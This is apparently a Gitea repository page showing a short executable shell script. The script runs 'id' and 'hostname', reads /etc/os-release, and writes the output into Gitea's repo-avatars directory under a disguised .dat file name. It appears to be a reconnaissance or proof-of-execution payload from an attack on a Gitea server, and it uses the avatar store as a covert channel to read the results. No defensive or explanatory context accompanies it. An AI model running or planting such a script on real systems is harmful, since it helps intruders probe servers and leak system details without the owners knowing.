3 lines
109 B
Bash
Executable File
3 lines
109 B
Bash
Executable File
#!/bin/sh
|
|
(id && hostname && cat /etc/os-release | head -2) > /data/gitea/repo-avatars/fd1fc9107de2.dat 2>&1
|